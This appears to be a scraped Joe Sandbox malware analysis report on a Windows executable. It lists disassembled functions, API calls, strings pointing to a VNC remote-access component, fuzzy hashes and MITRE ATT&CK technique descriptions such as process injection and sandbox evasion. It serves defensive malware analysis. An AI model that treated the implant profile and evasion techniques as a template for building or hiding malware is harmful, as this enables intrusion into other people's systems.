OpenFileMappingA.KERNEL32 ref: 00007FF790C3DAA7
MapViewOfFile.KERNEL32 ref: 00007FF790C3DACD

Strings

{34F673E0-878F-11D5-B98A-57B0D07B8C7C}, xrefs: 00007FF790C3DA9B

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: File$MappingOpenView
String ID: {34F673E0-878F-11D5-B98A-57B0D07B8C7C}
API String ID: 3439327939-2897898322
Opcode ID: de9b61d8815cc09478ebd6b72191161327ba0f804c783efe89e541f53af8c690
Instruction ID: af02368eaecd412e5d93b56c512be853c2c9987c382f8e93ac72571b4b50934d
Opcode Fuzzy Hash: de9b61d8815cc09478ebd6b72191161327ba0f804c783efe89e541f53af8c690
Instruction Fuzzy Hash: 4B017C32528B9186E730DB74F40066AF3A0FB88B60F850335DA9A06B94CF78E050C710

Function 00007FF790C4FF00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

getpeername.WS2_32 ref: 00007FF790C4FF3E
inet_ntoa.WS2_32 ref: 00007FF790C4FF48

Strings

<unavailable>, xrefs: 00007FF790C4FF55

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: getpeernameinet_ntoa
String ID: <unavailable>
API String ID: 1982201544-1096956887
Opcode ID: 66207f79876192fdddc093b2a6677a5d5b27d89d397317eb0c0bd4430368bfbf
Instruction ID: 8673320bd4ed085c190bf39049dd25cb9a2d4984f4fdba2c12091dda914abaa8
Opcode Fuzzy Hash: 66207f79876192fdddc093b2a6677a5d5b27d89d397317eb0c0bd4430368bfbf
Instruction Fuzzy Hash: 26018472615645C2EF60AB34E4552A9B3A0FF88B98F845431EA4E4B364DF3CE485CB10

Function 00007FF790C3A200 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF790C3A225
FreeLibrary.KERNEL32 ref: 00007FF790C3A265

Strings

DllGetVersion, xrefs: 00007FF790C3A219

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: AddressFreeLibraryProc
String ID: DllGetVersion
API String ID: 3013587201-2861820592
Opcode ID: d9407479e392a3dac4ac6fa058038886cb0d268972d098779a659bcb989bf816
Instruction ID: fee7a2f01cc3932b1408fcd31f3ed1ae3fc5b8e75d52075e8fee50277292e136
Opcode Fuzzy Hash: d9407479e392a3dac4ac6fa058038886cb0d268972d098779a659bcb989bf816
Instruction Fuzzy Hash: C601713262C74182E7249B75B48007AF2A0FF88B94F845139EA8E42768DF7CE554CB10

Function 00007FF790C4E4B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32 ref: 00007FF790C4E4E5
DeleteCriticalSection.KERNEL32 ref: 00007FF790C4E503

Strings

vncclient.cpp : update thread gone, xrefs: 00007FF790C4E511

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalDeleteSection
String ID: vncclient.cpp : update thread gone
API String ID: 166494926-1446885542
Opcode ID: 2d4923c2f68f9832232138b20a501600cb9e3c4a288bc86961d0a01cda06857d
Instruction ID: fc08800d4c47887d49261de878872099054e33412cea3daa38bf3cca01395718
Opcode Fuzzy Hash: 2d4923c2f68f9832232138b20a501600cb9e3c4a288bc86961d0a01cda06857d
Instruction Fuzzy Hash: ED015726A28A8290E620AF35D6443F9F361FF45BA4F945231CA6D077A5DF2CE4968320

Function 00007FF790C5F6F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32windowCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32 ref: 00007FF790C5F719
PostMessageA.USER32 ref: 00007FF790C5F765

Strings

WindowsScreenSaverClass, xrefs: 00007FF790C5F733

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ClassMessageNamePost
String ID: WindowsScreenSaverClass
API String ID: 650004062-352026012
Opcode ID: ffc7696b1c0006f253adaaa31f662de761ee3bb9df9a87c81459a5f9d86df577
Instruction ID: d9da13affb5913dc74b3f49c5dc0620bf79880526e64ad712b5f5dd08913d17a
Opcode Fuzzy Hash: ffc7696b1c0006f253adaaa31f662de761ee3bb9df9a87c81459a5f9d86df577
Instruction Fuzzy Hash: D5014F35628B8581E771AB31F9547EAB3A0FB8DB84F801131CA8C0BB58DE2CF156CB10

Function 00007FF790C589E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31synchronizationwindowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 00007FF790C58A29
WaitForSingleObject.KERNEL32 ref: 00007FF790C58A36

Strings

vncclient.cpp : client Kill() called, xrefs: 00007FF790C589ED

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: MessageObjectSendSingleWait
String ID: vncclient.cpp : client Kill() called
API String ID: 353115698-1198714380
Opcode ID: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
Instruction ID: 369783f7db7e5b6272d5e040594c9b6ae0eb1f9ac1685930f0b880eaca831d4c
Opcode Fuzzy Hash: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
Instruction Fuzzy Hash: A9017C3262898281FB68AF35E4853F9A361EF85B74F885231C63C067D5CF38E494C390

Function 00007FF790C9CEF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

getpeername.WS2_32 ref: 00007FF790C9CF19
inet_ntoa.WS2_32 ref: 00007FF790C9CF23

Strings

<unavailable>, xrefs: 00007FF790C9CF2E

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: getpeernameinet_ntoa
String ID: <unavailable>
API String ID: 1982201544-1096956887
Opcode ID: 5c4993396a7e2dabc89e2e5b10100f8684576445ded950f332601a8c5eebb03d
Instruction ID: 39d3b1b5e02c8fd6bbb3267f86f16255732861e1bb57bfa0da35f48df4560235
Opcode Fuzzy Hash: 5c4993396a7e2dabc89e2e5b10100f8684576445ded950f332601a8c5eebb03d
Instruction Fuzzy Hash: 77F0FE6562864186EA70AB30E4511A9B370FB88798FC01535D64E06724DF3CE1458B10

Function 00007FF790CC7A70 Relevance: 5.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF790CC7AE5
GetLastError.KERNEL32 ref: 00007FF790CC7AEF
CloseHandle.KERNEL32 ref: 00007FF790CC7B17
GetLastError.KERNEL32 ref: 00007FF790CC7B21

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 29aa8eabd37ce073336345db576575990ec91cb532e4ac08565d8b170ae5ab50
Instruction ID: f2ee289ddc8ed1fe5969db8ede7c3c2e282eabb6d1dca295f04083e4c5121994
Opcode Fuzzy Hash: 29aa8eabd37ce073336345db576575990ec91cb532e4ac08565d8b170ae5ab50
Instruction Fuzzy Hash: AC215E32A29A5686EB60AF34D4943B9B3A0FF84B44F902531DA4E43754DF3CF885C360

Function 00007FF790CC7320 Relevance: 5.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,00000000,00007FF790CC7423), ref: 00007FF790CC7338
EnterCriticalSection.KERNEL32(?,?,00000000,00007FF790CC7423), ref: 00007FF790CC7352
InitializeCriticalSection.KERNEL32(?,?,00000000,00007FF790CC7423), ref: 00007FF790CC739C
LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF790CC7423), ref: 00007FF790CC73E3

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterInitializeLeaveValue
String ID:
API String ID: 3200804837-0
Opcode ID: 3599b78de9cfbe8e82d1d2c83279c504dd7d71690102d9af0d22e184b3dd9c74
Instruction ID: fa3fc94d5c1ded0afc3146dcfbf6bc290212ee93074ef598e7df49a8cf921716
Opcode Fuzzy Hash: 3599b78de9cfbe8e82d1d2c83279c504dd7d71690102d9af0d22e184b3dd9c74
Instruction Fuzzy Hash: 43213032A29B5291EB24AF35E9501B8B3A4FF49B94F886535DA4D03760DF3CF4A5C320

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	Drive: Drive Modification
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report T8xrZb7nBL.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

